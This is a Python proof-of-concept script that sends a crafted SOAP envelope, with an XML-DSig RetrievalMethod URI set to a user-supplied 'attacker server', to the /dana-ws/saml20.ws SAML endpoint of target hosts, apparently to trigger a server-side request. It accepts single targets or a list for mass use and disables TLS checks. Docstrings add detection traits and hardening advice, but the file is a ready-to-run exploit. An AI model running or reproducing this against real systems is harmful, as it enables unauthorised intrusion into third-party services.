import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Silences urllib3's InsecureRequestWarning process-wide. The warning would
# otherwise be printed because send_poc() posts with verify=False, i.e. without
# validating the server's TLS certificate.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
import argparse
from urllib.parse import urlparse
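def ensure_http(url):
    """Return *url* with an explicit scheme, defaulting to HTTPS.

    Args:
        url: Address string as supplied on the command line or in a list file.

    Returns:
        ``url`` unchanged when it already begins with ``http://`` or
        ``https://`` (in any letter case); otherwise ``url`` prefixed with
        ``https://``.
    """
    # URI schemes are case-insensitive, so "HTTPS://host" already carries a
    # scheme and must not be rewritten to "https://HTTPS://host".
    if url.lower().startswith(("http://", "https://")):
        return url
    return f"https://{url}"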
def send_poc(target_url, attacker_server):
    """POST one SOAP envelope whose XML-DSig KeyInfo references an external URI.

    The body is a fixed ``soap:Envelope`` holding a ``ds:Signature`` with a
    placeholder ``ds:SignatureValue`` (``qwerty``) and a ``ds:RetrievalMethod``
    whose ``URI`` attribute is set to ``attacker_server``. Presumably the aim
    is to see whether the receiving service fetches that URI while handling
    the signature (a server-side request); the response is discarded here, so
    nothing in this function confirms it.

    Request characteristics a defender can match on, all fixed by this code:
      * HTTP POST to the path given in the URL, or ``/dana-ws/saml20.ws`` when
        the URL carries no path;
      * ``Content-Type: text/xml`` with ``User-Agent: curl/8.4.0``;
      * a ``ds:RetrievalMethod`` element with an absolute ``URI`` inside an
        otherwise empty signature (no ``ds:Reference``, empty ``ds:X509Data``).
    On the receiving side, the relevant hardening is signature processing that
    does not dereference ``RetrievalMethod`` URIs from unauthenticated input.

    Args:
        target_url: Address of the service; a missing scheme is filled in by
            ``ensure_http``.
        attacker_server: URL placed verbatim in the ``RetrievalMethod`` URI.

    Returns:
        None. The HTTP response is not examined.
    """
    envelope_template = """<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<ds:SignedInfo>
<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
<ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
</ds:SignedInfo>
<ds:SignatureValue>qwerty</ds:SignatureValue>
<ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig#" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<ds:RetrievalMethod URI="{attacker_server}"/>
<ds:X509Data/>
</ds:KeyInfo>
<ds:Object></ds:Object>
</ds:Signature>
</soap:Body>
</soap:Envelope>"""

    normalized = ensure_http(target_url)
    pieces = urlparse(normalized)

    # NOTE(review): the value is substituted without XML escaping, so a URL
    # containing '"', '&' or '<' yields a malformed document.
    body = envelope_template.format(attacker_server=attacker_server)

    # Fall back to the SAML web-service path only when the URL has no path.
    endpoint_path = pieces.path or "/dana-ws/saml20.ws"
    endpoint = f"{pieces.scheme}://{pieces.netloc}{endpoint_path}"

    request_headers = {
        "Content-Type": "text/xml",
        "User-Agent": "curl/8.4.0",
        "Accept": "*/*",
        "Connection": "close",
        # NOTE(review): character count, not encoded byte count; the two
        # differ if attacker_server contains non-ASCII characters.
        "Content-Length": str(len(body)),
    }

    # verify=False: the server's TLS certificate is not validated.
    requests.post(endpoint, data=body, headers=request_headers, verify=False)

    # NOTE(review): printed only after the POST has returned, despite the
    # present-tense wording.
    print(f"Sending PoC to {normalized}...")
def main():
    """Parse the command line and call ``send_poc`` for each requested target.

    Options:
        -u / --url:  a single target URL.
        -l / --list: path to a text file with one target per line; blank
                     lines are skipped.
        -a:          required; URL passed to ``send_poc`` as
                     ``attacker_server``.

    ``-u`` takes precedence: when both ``-u`` and ``-l`` are given, only the
    single URL is used. With neither, a usage hint is printed and nothing is
    sent.
    """
    cli = argparse.ArgumentParser(description='Send PoC to a target or targets from a list.')
    cli.add_argument('-u', '--url', type=str, help='Single target URL')
    cli.add_argument('-l', '--list', type=str, help='File path for a list of target URLs')
    cli.add_argument('-a', type=str, required=True, help='Attacker server URL')
    opts = cli.parse_args()

    if opts.url:
        send_poc(opts.url, opts.a)
        return

    if not opts.list:
        print("No target specified. Use -u for a single target or -l for a list of targets.")
        return

    with open(opts.list, 'r') as handle:
        for entry in map(str.strip, handle):
            # Skip lines that are empty once surrounding whitespace is removed.
            if entry:
                send_poc(entry, opts.a)
# Run the command-line interface only when executed as a script, not on import.
if __name__ == "__main__":
    main()